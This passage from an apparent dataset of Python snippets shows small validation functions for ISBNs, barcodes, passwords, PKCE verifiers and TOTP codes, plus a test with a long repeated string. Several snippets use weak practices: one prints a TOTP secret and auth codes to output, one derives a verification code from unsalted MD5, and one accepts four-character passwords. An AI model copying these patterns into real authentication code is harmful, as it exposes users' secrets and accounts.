verify_10(s):\n\t\t\treturn s\n\telif l==13:\n\t\tif verify_13(s):\n\t\t\treturn s\n\n\t# It's not the right length to be an ISBN\n\treturn False", "def test_long_string_positive_length(self):\n self.failUnlessEqual(self.callFunc('encode_longstr', 'hello world'), '\\x00\\x00\\x00\\x0bhello world', 'positive length long string encoding FAILED...')", "def valid_barcode(s):\n # implement this function!\n odd_digits = 0\n even_digits = 0\n result = 0\n for i in range(len(s) - 1):\n if i % 2 == 0:\n odd_digits += int(s[i])\n else:\n even_digits += int(s[i])\n result = (3 * odd_digits + even_digits) % 10\n if result != 0:\n result = 10 - result\n\n try:\n if int(s[-1]) == result and len(s) == 12:\n return True\n else:\n return False\n except IndexError:\n return False", "def code_verifier(n_bytes=64):\n verifier = base64.urlsafe_b64encode(os.urandom(n_bytes)).rstrip(b'=')\n # https://tools.ietf.org/html/rfc7636#section-4.1\n # minimum length of 43 characters and a maximum length of 128 characters.\n if len(verifier) < 43:\n raise ValueError(\"Verifier too short. n_bytes must be > 30.\")\n elif len(verifier) > 128:\n raise ValueError(\"Verifier too long. 
n_bytes must be < 97.\")\n else:\n return verifier", "def validate(info):\n\n\tif info == \"\": \n\t\treturn False\n\telse:\n\t\tif len(info) < 5 or len(info) > 32:\n\t\t\treturn False\n\t\telse:\n\t\t\treturn True", "def check_pwd(password: str) -> bool:\n # if len(password) > 0 and password[0].isdigit():\n # upper: List[Any] = [letter for letter in password if letter.isupper()]\n # lower: List[Any] = [letter for letter in password if letter.islower()]\n # return len(upper) > 1 and len(lower) > 0\n # else:\n # return False\n # Professor's solution\n return len(password) >= 4 \\\n and sum([1 for c in password if c.isupper()]) >= 2 \\\n and sum([1 for c in password if c.islower()]) >= 1 \\\n and password[0].isdigit()", "def max_length(verifield, required):\n if verifield is None: return True\n return len(verifield) <= required", "def test_password_strength_validator_length_fail(self):\n with self.assertRaises(ValidationError):\n validate_password_strength('hi')", "def check_ean(eancode):\n if not eancode:\n return True\n if len(eancode) <> 13:\n return False\n try:\n int(eancode)\n except:\n return False\n return ean_checksum(eancode) == int(eancode[-1])", "def test_valid_password(self):\n pass_field = Field(\"\".join(['x' * (int(self.app.config['MAX_PWD_LEN']))]))\n\n valid_password(None, pass_field)", "def verify_code(email, val):\r\n # TODO: is this the right string?\r\n verification_string = email.lower() + '|' + val\r\n return hashlib.md5(verification_string).hexdigest()", "def FirstPart(): \n return passwordChecker_incorrect(data)", "def validate_password(password):\n return isinstance(password, str) and len(password) >= 8 and \\\n re.search(r'[A-Z]', password) and re.search(r'[0-9]', password)", "def test_long_password():\n expect_error(register, InputError,\n \"abcdef\", \"a\" * (MIN_PASSWORD - 1), \"a\", \"A\", \"a\")", "def simple_validator(passport):\n if len(passport) == 8:\n return True\n if len(passport) == 7 and \"cid\" not in passport:\n return True\n return False", "def validate_code(request):\n user_id = api.keystone.get_user_id(request)\n print \"USER CHECK\"\n print user_id\n user = api.keystone.user_get(request, user_id)\n user_auth_code = request.GET.get('auth_code', None)\n secret = request.GET.get('secret', None)\n\n #Generate a code form our side using algorithm and use it to validate\n generated_code = api.keystone.generate_totp(secret)\n\n print secret\n print user_auth_code\n print generated_code\n print 'entering code comparison'\n \n data = {}\n extra = {}\n\n #Code comparison\n if user_auth_code == generated_code:\n data['totp_authenticated'] = True\n extra['two_factor_enabled'] = True\n\textra['secret_key'] = secret\n api.keystone.enable_2fa(request, user, **extra)\n else:\n \tprint 'falseeeeee'\n data['totp_authenticated'] = False\n return JsonResponse(data)", "def ospf_lsa_checksum(lsa):\n return fletcher16_checkbytes(b\"\\x00\\x00\" + lsa[2:], 16) # leave out age", "def len23(self, len): # -> None:\n ...", "def checkdigit(code):\n check = sum((i+1)*int(code[i]) for i in range(9)) % 11\n return 'X' if check == 10 else str(check)", "def validate(number):\n number = compact(number)\n if len(number) != 9:\n raise InvalidLength()\n if not isdigits(number[2:]):\n raise InvalidFormat()\n if not isdigits(number[:2]) and not all(x in 'ABCEHKMOPT' for x in number[:2]):\n raise InvalidFormat()\n if number[0] not in '1234567ABCEHKM':\n raise InvalidComponent()\n if number[-1] != calc_check_digit(number):\n raise InvalidChecksum()\n return number", "def 
length(value):\n\n # Try to return the length\n return len(value)", "def check(s1):\n chars = [0] * 128\n for c in s1:\n chars[ord(c)]+=1\n\n counter = 0\n for i in range(len(chars)):\n if chars[i] %2 != 0:\n counter+=1\n \n return counter <= 1", "def cleanCode(si):\n while len(si) < 4: si += 'x' # fill out the length of the code string\n so = \"\"\n for ii in range(4):\n if si[ii] in \"1234567890abcdefxyABCDEFX\": # check if this is a valid character\n# [0-9a-fA-FxyX]\n so += si[ii] # valid character\n else:\n so += \"xxxx\" # fill the string with 'x'\n ii = 4 # hit a bad one, stop checking string\n return so[:4] # clean code is 4 characters long", "def test_long(self):\n s = \"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ 
abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ 
abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ 
abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ 
abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ 